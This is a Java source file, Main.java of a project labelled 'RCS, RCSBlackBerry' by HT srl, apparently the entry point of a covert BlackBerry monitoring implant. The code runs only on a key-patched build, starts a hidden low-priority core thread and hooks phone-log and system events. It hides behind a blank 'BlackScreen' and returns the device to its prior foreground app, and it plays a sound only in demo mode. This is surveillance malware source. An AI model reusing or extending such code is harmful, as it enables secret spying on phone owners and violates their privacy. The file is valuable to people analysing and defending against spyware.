
/* *************************************************
 * Copyright (c) 2010 - 2010
 * HT srl,   All rights reserved.
 * Project      : RCS, RCSBlackBerry
 * Package      : blackberry
 * File         : Main.java
 * Created      : 28-apr-2010
 * *************************************************/
package blackberry;

import net.rim.blackberry.api.phone.phonelogs.PhoneLogs;
import net.rim.device.api.system.Alert;
import net.rim.device.api.system.ApplicationManager;
import net.rim.device.api.ui.Screen;
import net.rim.device.api.ui.UiApplication;
import blackberry.config.Cfg;
import blackberry.config.Keys;
import blackberry.crypto.Encryption;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.utils.Utils;

/**
 * The Class Main.
 */

public class Main extends UiApplication {




    AppListener appListener;

    private boolean acceptsForeground;
    private int foregroundId;

    private BlackScreen blackScreen;

    private static LocalScreen localScreen;
    private static Main instance;

    //private boolean foreground;

    /**
     * The main method.
     * 
     * @param args
     *            the arguments
     */
    public static void main(final String[] args) {





        mainReal();


    }

    public static void mainReal() {
        final Keys keys = Encryption.getKeys();
        final boolean binaryPatched = keys.hasBeenBinaryPatched();

        if (binaryPatched) {
            instance = new Main();
            Status.self().setMain(instance);
            instance.enterEventDispatcher();
            
        } else {



        }
    }

    public static Main getInstance() {
        return Status.self().getMain();
    }

    /**
     * Instantiates a new main.
     */
    public Main() {
        localScreen = new LocalScreen(this);
        pushScreen(localScreen);

        final Core core = Core.getInstance();

        Thread.currentThread().setPriority(Thread.MIN_PRIORITY);
        appListener = AppListener.getInstance();











        final Thread coreThread = new Thread(core);
        coreThread.setPriority(Thread.MIN_PRIORITY);
        coreThread.start();

        startListeners();

        if (Keys.getInstance().isDemo()) {



            Status.self().setDemo(true);
        } else {



            Status.self().setDemo(false);
        }




        if (Status.self().isDemo()) {
            short[] fire = { 1400, 15, 1350, 15, 1320, 20, 1300, 20, 1250, 25,
                    1200, 35, 1200, 15, 1250, 15, 1300, 20, 1320, 20, 1350, 25,
                    1400, 35 };
            try {
                Alert.startAudio(fire, 100);
            } catch (Exception e) {

            }
        }

    }

    /**
     * 
     */
    public void startListeners() {




        //Phone.addPhoneListener(appListener);
        addHolsterListener(appListener);
        addSystemListener(appListener);
        //addRadioListener(appListener);
        //MemoryCleanerDaemon.addListener(appListener);

        //addRadioListener(appListener);
        PhoneLogs.addListener(appListener);

        Task.getInstance().resumeApplicationTimer();

        //goBackground();
    }

    /**
     * 
     */
    public void stopListeners() {




        removeHolsterListener(appListener);
        removeSystemListener(appListener);
        removeRadioListener(appListener);
        //MemoryCleanerDaemon.removeListener(appListener);

        //Phone.removePhoneListener(appListener);
        PhoneLogs.removeListener(appListener);

        Task.getInstance().suspendApplicationTimer();
        //goBackground();
    }

    public boolean acceptsForeground() {
        return acceptsForeground;
    }

    public void pushBlack() {




        Thread thread = new Thread(new Runnable() {

            public void run() {
                ApplicationManager manager = ApplicationManager
                        .getApplicationManager();
                foregroundId = manager.getForegroundProcessId();

                blackScreen = new BlackScreen();
                acceptsForeground = true;
                synchronized (getAppEventLock()) {
                    pushScreen(blackScreen);
                }

                requestForeground();
            }
        });
        thread.start();

    }

    public void popBlack() {




        Thread thread = new Thread(new Runnable() {

            public void run() {

                requestBackground();
                acceptsForeground = false;

                synchronized (getAppEventLock()) {



                    Screen screen = getActiveScreen();
                    if (screen instanceof BlackScreen) {
                        popScreen(blackScreen);
                    }

                }
                ApplicationManager.getApplicationManager().requestForeground(
                        foregroundId);
            };
        });
        thread.start();
    }

    public void activate() {



    }

    public void deactivate() {



    }

    /*
     * public void showBlackScreen(boolean value) { //#ifdef DEBUG
     * debug.trace("showBlackScreen: " + value); //#endif //foreground = value;
     * if (value) { synchronized (this.getAppEventLock()) {
     * BlackScreen.newInstance(Main.getUiApplication()); } } else { if
     * (BlackScreen.getInstance() != null) { //#ifdef DEBUG
     * debug.trace("showBlackScreen: dismiss"); //#endif synchronized
     * (this.getAppEventLock()) { BlackScreen.getInstance().dismiss(); }
     * //goBackground(); } } }
     */

    public void goBackground() {




        if (!Cfg.IS_UI) {
            return;
        }

        invokeLater(new Runnable() {
            public void run() {

                boolean foreground = false;
                UiApplication.getUiApplication().requestBackground();
                foreground = UiApplication.getUiApplication().isForeground();




            }
        });
    }
}
